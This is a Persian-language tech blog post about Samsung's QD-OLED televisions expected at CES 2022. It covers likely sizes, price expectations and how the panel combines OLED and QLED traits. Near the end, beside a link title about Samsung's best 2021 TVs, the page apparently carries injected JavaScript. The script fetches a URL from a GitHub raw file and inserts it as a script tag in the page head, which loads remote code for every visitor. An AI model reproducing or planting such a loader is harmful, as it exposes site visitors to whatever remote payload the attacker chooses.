دسته‌بندی نشده

رونمایی از تلویزیون های QD-OLED سامسونگ در سال 2022

در نهایت کمپانی سامسونگ تصمیم گرفت تا از سری جدید تلویزیون هایش با پنل QD-OLED در CES 2022 رونمایی کند. طبق گزارشات قرار است این تلویزیون ها در اوایل این سال معرفی شوند. این تلویزیون ها ممکن است در سایز های 55 اینچ, 65 اینچ و اندازه بزرگ تر 70 اینچ ارائه شوند. البته درباره قیمت ان ها هیچگونه گزارشی نرسیده است ولی به دلیل اینکه بهترین تلویزیون های 4K موجود خواهند بود انتظار می رود که قیمت های بالایی داشته باشند.
اولین تلویزیون های کوانتوم OLED در سال 2019 عرضه شده است. از همین سال سامسونگ بر روی تکنولوژی جدید QD-OLED سرمایه گذاری می کند این پروسه قرار است تا سال 2025 ادامه داشته باشد بنابراین انتظار می رود که هر ساله پیشرفت های زیادی در ان ایجاد شود. 

در QD-OLED چه ویژگی هایی وجود دارد

QD-OLED ( کوانتوم اولد ) یک جانشین سامسونگ برای پنل QLED محسوب می شود.
از نظر ماهیتی QD-OLED ترکیبی از پنل های OLED و QLED می باشد و ویژگی های هر دو را به صورت یکجا ارائه می دهد و کنتراست بالا اولد را با قابلیت ارتقا رنگ های کیولد ترکیب می کند.
با توجه به گزارشاتی که می گویند این تلویزیون در بین تولیدات پرچمدار QLED و تلویزیون های برتر Micro LED قرار می گیرد باید از قیمت بالا و گران تر از تلویزیون های پرچمدار 2021 مانند QN900A 8K برخوردار باشند.
با وجود این گفته ها و مقالات ارائه شده و با توجه به استفاده ترکیبی از هر دو پنل کیولد و اولد در تکنولوژی  QD-OLED باید پنل به صورتی شگفت انگیز و رویایی ارائه شود. 

بررسی تلویزیون QLED سامسونگ مدل  Q60A

بهترین تلویزیون های 2021 سامسونگ (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *